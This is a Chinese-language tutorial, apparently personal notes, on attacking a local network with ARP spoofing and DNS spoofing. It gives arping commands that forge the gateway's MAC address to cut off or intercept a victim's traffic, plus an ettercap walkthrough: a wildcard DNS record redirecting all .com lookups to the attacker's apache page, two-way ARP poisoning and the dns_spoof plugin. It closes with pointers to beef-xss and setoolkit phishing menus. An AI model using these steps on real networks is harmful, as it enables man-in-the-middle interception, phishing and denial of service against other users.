局域網攻擊
ARP欺騙
arp地址轉換協議,工作在數據鏈路層,IP和mac地址的轉換 arp -a arp表 tcp/ip 五層: 物理層 數據鏈路層 網絡層 傳輸層 應用層
arping 實現 arp攻擊
1 #Arping簡要使用 2 -d arp緩沖清理 3 -A:與-U參數類似,但是使用的是ARP REPLY包而非ARP REQUEST包。 4 -b:發送以太網廣播幀,arping在開始時使用廣播地址,在收到回復后使用unicast單播地址。 5 -c:發送指定的count個ARP REQUEST包后停止。如果指定了-w參數,則會等待相同數量的ARP REPLY包,直到超時為止。 6 -D:重復地址探測模式,用來檢測有沒有IP地址沖突,如果沒有IP沖突則返回0。 7 -f:收到第一個響應包后退出。 8 -h:顯示幫助頁。 9 -I:用來發送ARP REQUEST包的網絡設備的名稱。 10 -q:quite模式,不顯示輸出。 11 -U:無理由的(強制的)ARP模式去更新別的主機上的ARP CACHE列表中的本機的信息,不需要響應。 12 -V:顯示arping的版本號。 13 -w:指定一個超時時間,單位為秒,arping在到達指定時間后退出,無論期間發送或接收了多少包。在這種情況下,arping在發送完指定的count(-c)個包后並不會停止,而是等待到超時或發送的count個包都進行了回應后才會退出。 14 -s:設置發送ARP包的IP資源地址,如果為空,則按如下方式處理: 15 1、DAD模式(-D)設置為0.0.0.0; 16 2、Unsolicited模式(-U)設置為目標地址; 17 3、其它方式,從路由表計算。
#Arp欺騙命令,斷網攻擊
1 #將受害主機IP的網關地址偽造實現數據斷網或截獲 2 Arping -s 偽造MAC -S 網關IP地址 受害主機IP地址 3 4 #開啟數據轉發 5 echo 1 > /proc/sys/net/ipv4/ip_forward 6 7 #運行本地抓包 8 wireshark
DNS欺騙
事先要設置好的: #修改dns解析記錄 vim /etc/ettercap/etter.dns 在里面加上一行:
把.com 的解析為本機IP 192.168.33.143
*.*.com A 192.168.33.143
#開啟apache 網站 /var/www/html/ 修改自定義頁面
開啟apache服務器:
service apache2 start
#接下來開始搞事情
#啟動 ettercap 工具: ettercap -G
選對網卡eth0,點勾 
hosts 下面有個放大鏡嗅探當前局域網的主機
點擊host 列表
add to target1 和2 就是雙向欺騙 常見配置:target1為網關,2為受害者

點擊 mitm (中間人攻擊的意思)下的 arp poisoning(arp 投毒攻擊)

sniff remote connections打上:

雙向欺騙已經設置完
下面開始dns欺騙
如下圖點擊plugins插件:
雙擊dns_spoof即可開啟dns欺騙:
被攻擊的主機訪問 .com 域名時,就是變成你自己設置的網頁。
欺騙成功!
1 DNS欺騙整個過程: 2 #啟動 kali 3 ettercap -G 4 5 hosts 下面有個掃描當前的主機 6 add to target1 和2 就是雙向欺騙 7 常見配置:1為網關,2為受害者 8 mitm 下的 sniff remote connections打上 9 10 #修改dns解析記錄 11 vim /etc/ettercap/etter.dns 12 在里面加上一行: 13 *.*.com A 192.168.33.143 14 15 開啟apache 網站 16 /var/www/html/ 修改自定義頁面 17 service apache2 start 18 19 開啟plugins 的dns_spoof 20 21 22 #配合beef 23 beef-xss 24 25 #配合釣魚 26 setoolkit 27 選擇 2 5 2 28 29 #netfuke使用 30 很nb
target